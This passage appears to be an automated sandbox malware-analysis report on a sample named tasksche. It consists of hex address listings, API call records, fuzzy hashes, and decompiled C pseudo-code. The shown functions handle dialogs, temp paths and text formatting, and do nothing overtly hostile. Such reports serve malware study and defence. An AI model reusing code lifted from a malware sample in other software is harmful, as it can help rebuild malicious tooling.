                                                                                              0x0040f1a5
                                                                                              0x0040f1a5
                                                                                              0x0040f251
                                                                                              0x0040f251
                                                                                              0x0040f253
                                                                                              0x0040f25a
                                                                                              0x0040f264
                                                                                              0x0040f26b
                                                                                              0x0040f26b
                                                                                              0x0040f278
                                                                                              0x0040f27f
                                                                                              0x0040f284
                                                                                              0x0040f28b
                                                                                              0x0040f297
                                                                                              0x0040f297
                                                                                              0x0040f2a4
                                                                                              0x0040f2a9
                                                                                              0x0040f2b0
                                                                                              0x0040f2ba
                                                                                              0x0040f2c7
                                                                                              0x0040f2ce
                                                                                              0x0040f2ce
                                                                                              0x0040f2da
                                                                                              0x0040f2e1
                                                                                              0x0040f2e6
                                                                                              0x0040f2e7
                                                                                              0x0040f2e8
                                                                                              0x0040f2ee
                                                                                              0x0040f2f5
                                                                                              0x0040f2f7
                                                                                              0x0040f2f7
                                                                                              0x0040f30c
                                                                                              0x0040f311
                                                                                              0x0040f31d
                                                                                              0x0040f31f
                                                                                              0x0040f330
                                                                                              0x0040f33d
                                                                                              0x00000000
                                                                                              0x0040f321
                                                                                              0x0040f32c
                                                                                              0x0040f32e
                                                                                              0x0040f342
                                                                                              0x0040f34b
                                                                                              0x0040f357
                                                                                              0x0040f35e
                                                                                              0x0040f363
                                                                                              0x0040f364
                                                                                              0x0040f36c
                                                                                              0x0040f378
                                                                                              0x0040f37a
                                                                                              0x0040f37c
                                                                                              0x0040f382
                                                                                              0x0040f38b
                                                                                              0x0040f38d
                                                                                              0x0040f38f
                                                                                              0x0040f395
                                                                                              0x0040f39e
                                                                                              0x0040f3a0
                                                                                              0x0040f3a2
                                                                                              0x0040f3a8
                                                                                              0x0040f3b3
                                                                                              0x0040f3b6
                                                                                              0x0040f3b8
                                                                                              0x0040f3be
                                                                                              0x0040f3c8
                                                                                              0x0040f3d1
                                                                                              0x0040f3d6
                                                                                              0x0040f3de
                                                                                              0x0040f3e2
                                                                                              0x0040f3f0
                                                                                              0x0040f3f0
                                                                                              0x0040f405
                                                                                              0x0040f405
                                                                                              0x0040f421
                                                                                              0x0040f426
                                                                                              0x0040f42b
                                                                                              0x0040e8a9
                                                                                              0x0040e8af
                                                                                              0x0040e8b5
                                                                                              0x0040e8ba
                                                                                              0x0040e8c0
                                                                                              0x0040e8c3
                                                                                              0x0040e8c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e8e3
                                                                                              0x0040e8fd
                                                                                              0x0040e904
                                                                                              0x00000000
                                                                                              0x0040e906
                                                                                              0x00000000
                                                                                              0x0040e906
                                                                                              0x0040e904
                                                                                              0x0040e90b
                                                                                              0x0040e90f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e918
                                                                                              0x00000000
                                                                                              0x0040e91f
                                                                                              0x0040e923
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e931
                                                                                              0x0040e94c
                                                                                              0x0040e957
                                                                                              0x0040e95c
                                                                                              0x0040e96d
                                                                                              0x0040e978
                                                                                              0x0040e97d
                                                                                              0x0040e98c
                                                                                              0x0040e991
                                                                                              0x0040e993
                                                                                              0x0040eaf2
                                                                                              0x0040eaf2
                                                                                              0x0040eafc
                                                                                              0x00000000
                                                                                              0x0040e999
                                                                                              0x0040e999
                                                                                              0x0040e99e
                                                                                              0x0040e9a7
                                                                                              0x0040e9ad
                                                                                              0x0040e9b4
                                                                                              0x0040ea5c
                                                                                              0x0040ea63
                                                                                              0x0040ea65
                                                                                              0x0040ea68
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ea71
                                                                                              0x0040ea77
                                                                                              0x0040ea79
                                                                                              0x00000000
                                                                                              0x0040ea7b
                                                                                              0x0040ea7b
                                                                                              0x0040ea7e
                                                                                              0x0040ea7f
                                                                                              0x0040ea87
                                                                                              0x0040ea97
                                                                                              0x0040ea9c
                                                                                              0x0040eaa6
                                                                                              0x0040eaa8
                                                                                              0x0040eaab
                                                                                              0x0040ea81
                                                                                              0x0040ea81
                                                                                              0x0040ea81
                                                                                              0x0040ea84
                                                                                              0x00000000
                                                                                              0x0040eaad
                                                                                              0x0040eabb
                                                                                              0x0040eac1
                                                                                              0x0040eac3
                                                                                              0x0040ead0
                                                                                              0x0040ead0
                                                                                              0x00000000
                                                                                              0x0040eac3
                                                                                              0x0040eaab
                                                                                              0x0040ea79
                                                                                              0x0040e9c9
                                                                                              0x0040e9d6
                                                                                              0x0040e9e2
                                                                                              0x0040e9e8
                                                                                              0x0040e9eb
                                                                                              0x0040e9ee
                                                                                              0x0040ea02
                                                                                              0x0040ea09
                                                                                              0x0040ea0e
                                                                                              0x0040ea10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ea16
                                                                                              0x0040ea1d
                                                                                              0x0040ea22
                                                                                              0x0040ea26
                                                                                              0x0040ea33
                                                                                              0x0040ea38
                                                                                              0x0040ea3b
                                                                                              0x0040ea3d
                                                                                              0x0040ea3e
                                                                                              0x0040ea48
                                                                                              0x0040ea4f
                                                                                              0x0040ea56
                                                                                              0x00000000
                                                                                              0x0040ea56
                                                                                              0x0040e9f7
                                                                                              0x0040e9fd
                                                                                              0x0040ea00
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ead6
                                                                                              0x0040ead6
                                                                                              0x0040eae5
                                                                                              0x0040eaea
                                                                                              0x0040eaea
                                                                                              0x00000000
                                                                                              0x0040e99e
                                                                                              0x00000000
                                                                                              0x0040eb06
                                                                                              0x0040eb0a
                                                                                              0x0040eb2e
                                                                                              0x0040eb32
                                                                                              0x0040eb3c
                                                                                              0x0040eb44
                                                                                              0x0040eb34
                                                                                              0x0040eb34
                                                                                              0x0040eb34
                                                                                              0x0040eb46
                                                                                              0x0040eb4a
                                                                                              0x0040eb5c
                                                                                              0x0040eb4c
                                                                                              0x0040eb4c
                                                                                              0x0040eb4c
                                                                                              0x0040eb5f
                                                                                              0x0040eb64
                                                                                              0x0040eb6a
                                                                                              0x0040eb6b
                                                                                              0x0040eb71
                                                                                              0x0040eb76
                                                                                              0x0040eb79
                                                                                              0x0040eb7d
                                                                                              0x0040eb82
                                                                                              0x0040eb84
                                                                                              0x0040eb84
                                                                                              0x0040eb86
                                                                                              0x0040eb86
                                                                                              0x0040eb8b
                                                                                              0x0040eb90
                                                                                              0x0040eb94
                                                                                              0x0040eb95
                                                                                              0x0040eb96
                                                                                              0x0040eb9c
                                                                                              0x0040eb9d
                                                                                              0x0040eba2
                                                                                              0x0040eba2
                                                                                              0x0040eb96
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040eba8
                                                                                              0x0040ebac
                                                                                              0x0040ebbc
                                                                                              0x0040ebbc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ebc7
                                                                                              0x0040ebcb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ebd1
                                                                                              0x0040ebd9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ebdf
                                                                                              0x0040ebe1
                                                                                              0x0040ebe9
                                                                                              0x0040ebef
                                                                                              0x0040ebf2
                                                                                              0x0040ebf9
                                                                                              0x0040ebfb
                                                                                              0x0040ec01
                                                                                              0x0040ec01
                                                                                              0x0040ec05
                                                                                              0x0040ec0b
                                                                                              0x0040ec0d
                                                                                              0x00000000
                                                                                              0x0040ec13
                                                                                              0x0040ec13
                                                                                              0x0040ec16
                                                                                              0x0040ec1a
                                                                                              0x0040ec36
                                                                                              0x0040ec36
                                                                                              0x0040ec3a
                                                                                              0x0040ed1b
                                                                                              0x0040ed1b
                                                                                              0x0040ed1c
                                                                                              0x0040ed1c
                                                                                              0x0040ed22
                                                                                              0x0040ed23
                                                                                              0x0040ed28
                                                                                              0x0040ed28
                                                                                              0x0040ed29
                                                                                              0x0040ed2a
                                                                                              0x0040ed2a
                                                                                              0x0040ed33
                                                                                              0x0040ed38
                                                                                              0x0040ed39
                                                                                              0x0040ed3a
                                                                                              0x0040ed3c
                                                                                              0x0040ed3e
                                                                                              0x0040ed43
                                                                                              0x0040ed45
                                                                                              0x0040ed45
                                                                                              0x0040ed47
                                                                                              0x0040ed47
                                                                                              0x0040ed43
                                                                                              0x0040ed52
                                                                                              0x0040ed57
                                                                                              0x0040ed58
                                                                                              0x0040ed61
                                                                                              0x0040ed71
                                                                                              0x0040ed7b
                                                                                              0x0040ed8a
                                                                                              0x0040ed90
                                                                                              0x0040ed98
                                                                                              0x0040ed9d
                                                                                              0x0040ed9e
                                                                                              0x0040ed9f
                                                                                              0x0040eda1
                                                                                              0x0040edb6
                                                                                              0x0040edb6
                                                                                              0x00000000
                                                                                              0x0040eda1
                                                                                              0x0040ec40
                                                                                              0x0040ec43
                                                                                              0x0040ec50
                                                                                              0x0040ec50
                                                                                              0x0040ec62
                                                                                              0x0040ec68
                                                                                              0x0040ec6a
                                                                                              0x0040ec70
                                                                                              0x0040ec77
                                                                                              0x0040ec85
                                                                                              0x0040ec95
                                                                                              0x0040ec9b
                                                                                              0x0040ec9e
                                                                                              0x0040eca3
                                                                                              0x0040eca6
                                                                                              0x0040eca8
                                                                                              0x0040eca8
                                                                                              0x0040ecab
                                                                                              0x0040ecab
                                                                                              0x0040ecad
                                                                                              0x0040ecad
                                                                                              0x0040ecb5
                                                                                              0x0040ecbd
                                                                                              0x0040ecbf
                                                                                              0x0040ecc6
                                                                                              0x0040eccb
                                                                                              0x0040ecd5
                                                                                              0x0040ece3
                                                                                              0x0040ece8
                                                                                              0x0040ece9
                                                                                              0x0040ece9
                                                                                              0x0040ecd5
                                                                                              0x0040ecf0
                                                                                              0x0040ecf2
                                                                                              0x0040ecfe
                                                                                              0x0040ed02
                                                                                              0x0040ed08
                                                                                              0x00000000
                                                                                              0x0040ed0a
                                                                                              0x0040ed14
                                                                                              0x00000000
                                                                                              0x0040ed14
                                                                                              0x0040ed08
                                                                                              0x0040ec45
                                                                                              0x0040ec4a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ec4a
                                                                                              0x0040ec1c
                                                                                              0x0040ec21
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ec23
                                                                                              0x0040ec23
                                                                                              0x0040ec26
                                                                                              0x0040ec2a
                                                                                              0x00000000
                                                                                              0x0040ec30
                                                                                              0x0040ec30
                                                                                              0x00000000
                                                                                              0x0040ec30
                                                                                              0x0040ec2a
                                                                                              0x00000000
                                                                                              0x0040edc1
                                                                                              0x0040edc2
                                                                                              0x0040edc7
                                                                                              0x0040edc9
                                                                                              0x0040edcb
                                                                                              0x0040edcc
                                                                                              0x0040edcc
                                                                                              0x00000000
                                                                                              0x0040ee02
                                                                                              0x0040ee09
                                                                                              0x0040ee09
                                                                                              0x0040ee0c
                                                                                              0x0040ee39
                                                                                              0x0040ee39
                                                                                              0x0040ee40
                                                                                              0x00000000
                                                                                              0x0040ee40
                                                                                              0x0040ee0e
                                                                                              0x0040ee0e
                                                                                              0x0040ee11
                                                                                              0x0040ee26
                                                                                              0x0040ee2d
                                                                                              0x0040ee2d
                                                                                              0x00000000
                                                                                              0x0040ee2d
                                                                                              0x0040ee13
                                                                                              0x0040ee13
                                                                                              0x0040ee14
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ee16
                                                                                              0x0040ee16
                                                                                              0x0040ee17
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ee1d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ee8f
                                                                                              0x0040ee93
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ee95
                                                                                              0x0040eea1
                                                                                              0x0040eea6
                                                                                              0x0040eea7
                                                                                              0x0040eea8
                                                                                              0x0040eeaa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040eeac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040eed4
                                                                                              0x0040eed8
                                                                                              0x0040f04f
                                                                                              0x0040f04f
                                                                                              0x0040f053
                                                                                              0x0040f059
                                                                                              0x0040f060
                                                                                              0x0040f062
                                                                                              0x0040f062
                                                                                              0x0040f06c
                                                                                              0x0040f06c
                                                                                              0x00000000
                                                                                              0x0040f053
                                                                                              0x0040eee6
                                                                                              0x0040eef4
                                                                                              0x0040eef9
                                                                                              0x0040eefd
                                                                                              0x0040eeff
                                                                                              0x0040ef0c
                                                                                              0x0040ef0c
                                                                                              0x0040ef1a
                                                                                              0x0040ef2a
                                                                                              0x0040ef30
                                                                                              0x0040ef31
                                                                                              0x0040ef33
                                                                                              0x0040ef36
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ef06
                                                                                              0x0040ef06
                                                                                              0x0040ef06
                                                                                              0x0040ef09
                                                                                              0x0040ef09
                                                                                              0x0040ef44
                                                                                              0x0040ef4a
                                                                                              0x0040ef52
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ef58
                                                                                              0x0040ef5f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ef65
                                                                                              0x0040ef67
                                                                                              0x0040ef6e
                                                                                              0x0040ef77
                                                                                              0x0040ef7c
                                                                                              0x0040ef7d
                                                                                              0x0040ef7e
                                                                                              0x0040ef80
                                                                                              0x0040efcc
                                                                                              0x0040efcc
                                                                                              0x0040efd4
                                                                                              0x0040efdd
                                                                                              0x0040efe9
                                                                                              0x0040eff7
                                                                                              0x0040effc
                                                                                              0x0040f006
                                                                                              0x0040f00b
                                                                                              0x0040f00d
                                                                                              0x0040f01d
                                                                                              0x0040f027
                                                                                              0x0040f02d
                                                                                              0x0040f030
                                                                                              0x00000000
                                                                                              0x0040f036
                                                                                              0x0040f03b
                                                                                              0x0040f042
                                                                                              0x0040f049
                                                                                              0x00000000
                                                                                              0x0040f049
                                                                                              0x0040f030
                                                                                              0x0040ef82
                                                                                              0x0040ef84
                                                                                              0x0040ef8b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ef8d
                                                                                              0x0040ef93
                                                                                              0x0040ef93
                                                                                              0x0040ef97
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ef99
                                                                                              0x0040ef9a
                                                                                              0x0040efa1
                                                                                              0x0040efa5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040efa7
                                                                                              0x0040efa9
                                                                                              0x0040efb4
                                                                                              0x0040efbb
                                                                                              0x0040efc0
                                                                                              0x0040efc1
                                                                                              0x0040efc1
                                                                                              0x0040efc3
                                                                                              0x0040efc4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040f078
                                                                                              0x0040f07c
                                                                                              0x0040f07e
                                                                                              0x0040f086
                                                                                              0x0040f092
                                                                                              0x0040f092
                                                                                              0x0040f098
                                                                                              0x0040f0a0
                                                                                              0x0040f0a0
                                                                                              0x0040f0a5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040f0b1
                                                                                              0x0040f0b5
                                                                                              0x0040eebc
                                                                                              0x0040eebc
                                                                                              0x00000000
                                                                                              0x0040eebc
                                                                                              0x0040f0bb
                                                                                              0x0040eeae
                                                                                              0x0040eeae
                                                                                              0x0040eeb1
                                                                                              0x0040eeb7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040f3f8
                                                                                              0x0040f3fc
                                                                                              0x0040f3fe
                                                                                              0x0040f3fe
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ee4c
                                                                                              0x0040ee54
                                                                                              0x0040ee5a
                                                                                              0x0040ee5d
                                                                                              0x0040ee83
                                                                                              0x0040ee5f
                                                                                              0x0040ee5f
                                                                                              0x0040ee62
                                                                                              0x0040ee77
                                                                                              0x0040ee64
                                                                                              0x0040ee64
                                                                                              0x0040ee6b
                                                                                              0x0040ee6b
                                                                                              0x0040ee62
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040eec8
                                                                                              0x0040eec9
                                                                                              0x0040eece
                                                                                              0x0040eed0
                                                                                              0x0040eed0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e8ca
                                                                                              0x0040e8ce
                                                                                              0x0040e8d3
                                                                                              0x0040e8da
                                                                                              0x0040e8da
                                                                                              0x0040e8dd
                                                                                              0x00000000
                                                                                              0x0040e8df
                                                                                              0x0040e8df
                                                                                              0x00000000
                                                                                              0x0040e8df
                                                                                              0x0040e8dd
                                                                                              0x0040f437
                                                                                              0x0040f43f
                                                                                              0x0040f43f
                                                                                              0x00000000
                                                                                              0x0040f32e
                                                                                              0x0040f31f
                                                                                              0x0040f161
                                                                                              0x0040f0c6

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$ChangeNotify_wcschr_wcsncpy
                                                                                              • String ID: "$.lnk
                                                                                              • API String ID: 1911921660-4024015082
                                                                                              • Opcode ID: bb3ca6cd81c2d3ad9077df71b8a1193f574709db9a1feafa84c70d00a6701fe0
                                                                                              • Instruction ID: e9d5912a6b4b3542aee3cadb88dbd3b5a863ff0206024957ce050cac0ef3000c
                                                                                              • Opcode Fuzzy Hash: bb3ca6cd81c2d3ad9077df71b8a1193f574709db9a1feafa84c70d00a6701fe0
                                                                                              • Instruction Fuzzy Hash: 5191227280022899DF35DBA5CC49EEEB37CBB44304F4405BBE509F7181EB789AD98B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(?,?), ref: 0040EEE6
                                                                                                • Part of subcall function 0040A116: _wcslen.LIBCMT ref: 0040A11C
                                                                                                • Part of subcall function 0040A116: _wcscat.LIBCMT ref: 0040A13B
                                                                                              • _swprintf.LIBCMT ref: 0040EF22
                                                                                                • Part of subcall function 0040BC16: __vswprintf_c_l.LIBCMT ref: 0040BC29
                                                                                              • SetDlgItemTextW.USER32 ref: 0040EF44
                                                                                              • _wcschr.LIBCMT ref: 0040EF77
                                                                                              • _wcscpy.LIBCMT ref: 0040EFBB
                                                                                              • _wcscpy.LIBCMT ref: 0040EFE4
                                                                                              • _wcscpy.LIBCMT ref: 0040EFF7
                                                                                              • MessageBoxW.USER32(?,00000000,00000000,00000024), ref: 0040F027
                                                                                              • EndDialog.USER32(?,00000001), ref: 0040F049
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$DialogItemMessagePathTempText__vswprintf_c_l_swprintf_wcscat_wcschr_wcslen
                                                                                              • String ID: %s%s%d
                                                                                              • API String ID: 1897388972-1000756122
                                                                                              • Opcode ID: f75e7cfbeccc15e09081c60efc06442c44850a7c3c336a2ff36c1e07c701c860
                                                                                              • Instruction ID: 7c5ef0a1406295de31e953a15a9408ca88d5d0b5476cb7747de3243763a4baae
                                                                                              • Opcode Fuzzy Hash: f75e7cfbeccc15e09081c60efc06442c44850a7c3c336a2ff36c1e07c701c860
                                                                                              • Instruction Fuzzy Hash: 325176728001199BDB21DF61DC44BEE77B8FB04308F0445BBEA09E7191E7789AE98F59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E004191D8(void* __ebx, void* __eflags, short* _a4) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				short* _t32;
                                                                                              				signed int _t33;
                                                                                              				signed int _t41;
                                                                                              				void* _t51;
                                                                                              				void* _t52;
                                                                                              				short* _t53;
                                                                                              				short* _t55;
                                                                                              				short* _t57;
                                                                                              
                                                                                              				_push(_t43);
                                                                                              				_t57 = _a4;
                                                                                              				_push(_t52);
                                                                                              				_t53 = E0041CF3E(__ebx, _t51, _t52, 0x200 + E0041A7AF(_t57) * 0xc);
                                                                                              				_v12 = _t53;
                                                                                              				if(_t53 != 0) {
                                                                                              					_push(__ebx);
                                                                                              					E0041A7F7(_t53, L"<style>body{font-family:\"Arial\";font-size:12;}</style>");
                                                                                              					_t41 = E0041A7AF(_t53);
                                                                                              					__eflags =  *_t57;
                                                                                              					while(__eflags != 0) {
                                                                                              						_t33 = E00411E81(__eflags, _t57, L"\r\n\r\n", 4);
                                                                                              						__eflags = _t33;
                                                                                              						if(_t33 != 0) {
                                                                                              							__eflags = _t57 - _a4;
                                                                                              							if(_t57 <= _a4) {
                                                                                              								L13:
                                                                                              								 *((short*)(_t53 + _t41 * 2)) =  *_t57;
                                                                                              								_t41 = _t41 + 1;
                                                                                              								__eflags = _t41;
                                                                                              							} else {
                                                                                              								__eflags =  *_t57 - 0x20;
                                                                                              								if( *_t57 != 0x20) {
                                                                                              									goto L13;
                                                                                              								} else {
                                                                                              									__eflags =  *((short*)(_t57 - 2)) - 0x20;
                                                                                              									if( *((short*)(_t57 - 2)) != 0x20) {
                                                                                              										goto L13;
                                                                                              									} else {
                                                                                              										E0041A7F7(_t53 + _t41 * 2, L"&nbsp;");
                                                                                              										_t41 = _t41 + 6;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t55 = _t57 + 4;
                                                                                              							__eflags =  *_t55 - 0xd;
                                                                                              							if( *_t55 == 0xd) {
                                                                                              								_v8 = _v12 + _t41 * 2;
                                                                                              								while(1) {
                                                                                              									__eflags =  *((short*)(_t57 + 6)) - 0xa;
                                                                                              									if( *((short*)(_t57 + 6)) != 0xa) {
                                                                                              										goto L8;
                                                                                              									}
                                                                                              									E0041A7F7(_v8, L"<br>");
                                                                                              									_v8 = _v8 + 8;
                                                                                              									_t57 = _t55;
                                                                                              									_t55 = _t57 + 4;
                                                                                              									_t41 = _t41 + 4;
                                                                                              									__eflags =  *_t55 - 0xd;
                                                                                              									if( *_t55 == 0xd) {
                                                                                              										continue;
                                                                                              									}
                                                                                              									goto L8;
                                                                                              								}
                                                                                              							}
                                                                                              							L8:
                                                                                              							_t53 = _v12;
                                                                                              							_t57 = _t57 + 2;
                                                                                              						}
                                                                                              						_t57 = _t57 + 2;
                                                                                              						__eflags =  *_t57;
                                                                                              					}
                                                                                              					_push(_a4);
                                                                                              					__eflags = 0;
                                                                                              					 *((short*)(_t53 + _t41 * 2)) = 0;
                                                                                              					E0041A506(_t41, _t53, _t57, 0);
                                                                                              					_t32 = _t53;
                                                                                              				} else {
                                                                                              					_t32 = _t57;
                                                                                              				}
                                                                                              				return _t32;
                                                                                              			}
















                                                                                              0x004191dc
                                                                                              0x004191de
                                                                                              0x004191e1
                                                                                              0x004191f6
                                                                                              0x004191fa
                                                                                              0x004191ff
                                                                                              0x00419208
                                                                                              0x0041920f
                                                                                              0x0041921a
                                                                                              0x00419221
                                                                                              0x00419225
                                                                                              0x00419233
                                                                                              0x00419238
                                                                                              0x0041923a
                                                                                              0x0041927d
                                                                                              0x00419280
                                                                                              0x004192a4
                                                                                              0x004192a7
                                                                                              0x004192ab
                                                                                              0x004192ab
                                                                                              0x00419282
                                                                                              0x00419282
                                                                                              0x00419286
                                                                                              0x00000000
                                                                                              0x00419288
                                                                                              0x00419288
                                                                                              0x0041928d
                                                                                              0x00000000
                                                                                              0x0041928f
                                                                                              0x00419298
                                                                                              0x0041929f
                                                                                              0x0041929f
                                                                                              0x0041928d
                                                                                              0x00419286
                                                                                              0x0041923c
                                                                                              0x0041923c
                                                                                              0x0041923f
                                                                                              0x00419243
                                                                                              0x0041924b
                                                                                              0x0041924e
                                                                                              0x0041924e
                                                                                              0x00419253
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041925d
                                                                                              0x00419262
                                                                                              0x00419266
                                                                                              0x00419268
                                                                                              0x0041926c
                                                                                              0x0041926f
                                                                                              0x00419274
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00419274
                                                                                              0x0041924e
                                                                                              0x00419276
                                                                                              0x00419276
                                                                                              0x0041927a
                                                                                              0x0041927a
                                                                                              0x004192ad
                                                                                              0x004192ae
                                                                                              0x004192ae
                                                                                              0x004192b8
                                                                                              0x004192bb
                                                                                              0x004192bd
                                                                                              0x004192c1
                                                                                              0x004192c7
                                                                                              0x00419201
                                                                                              0x00419201
                                                                                              0x00419201
                                                                                              0x004192cd

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 004191E3
                                                                                              • _malloc.LIBCMT ref: 004191F1
                                                                                                • Part of subcall function 0041CF3E: __FF_MSGBANNER.LIBCMT ref: 0041CF61
                                                                                                • Part of subcall function 0041CF3E: __NMSG_WRITE.LIBCMT ref: 0041CF68
                                                                                                • Part of subcall function 0041CF3E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004212F4,00000000,00000001,00000000,?,0041EF2D,00000018,0042D930,0000000C,0041EFBE), ref: 0041CFB5
                                                                                              • _wcscpy.LIBCMT ref: 0041920F
                                                                                              • _wcslen.LIBCMT ref: 00419215
                                                                                              • _wcscpy.LIBCMT ref: 0041925D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy_wcslen$AllocateHeap_malloc
                                                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                              • API String ID: 2405444336-406990186
                                                                                              • Opcode ID: 4b4a1cae5e7a93affbfc5e59a2b65d92d146fa889393bb29aeeeda0ea8609ab4
                                                                                              • Instruction ID: 0e02d37120f5dc5c9773bcbd7ae744d1444ccd80410fa70afd17435bf81929d8
                                                                                              • Opcode Fuzzy Hash: 4b4a1cae5e7a93affbfc5e59a2b65d92d146fa889393bb29aeeeda0ea8609ab4
                                                                                              • Instruction Fuzzy Hash: BF21FB76904304BBDB20AB54DC41ADAB3B4EF45314B20445BE455A7390E7BC9ED1839E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 86%
                                                                                              			E0040F47B(void* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0, struct HWND__* _a4, struct HWND__* _a8, signed short _a12, intOrPtr _a16) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __ebp;
                                                                                              				void* _t14;
                                                                                              				long _t15;
                                                                                              				long _t16;
                                                                                              				struct HWND__* _t18;
                                                                                              				void* _t32;
                                                                                              				struct HWND__* _t34;
                                                                                              				void* _t36;
                                                                                              				void* _t41;
                                                                                              				void* _t42;
                                                                                              				void* _t49;
                                                                                              
                                                                                              				_t49 = __fp0;
                                                                                              				_t38 = __edx;
                                                                                              				_t34 = _a4;
                                                                                              				if(E004060EE(__edx, _t34, _a8, _a12, _a16, L"LICENSEDLG", 0, 0) != 0) {
                                                                                              					L15:
                                                                                              					__eflags = 1;
                                                                                              					return 1;
                                                                                              				}
                                                                                              				_t14 = _a8 - 0x110;
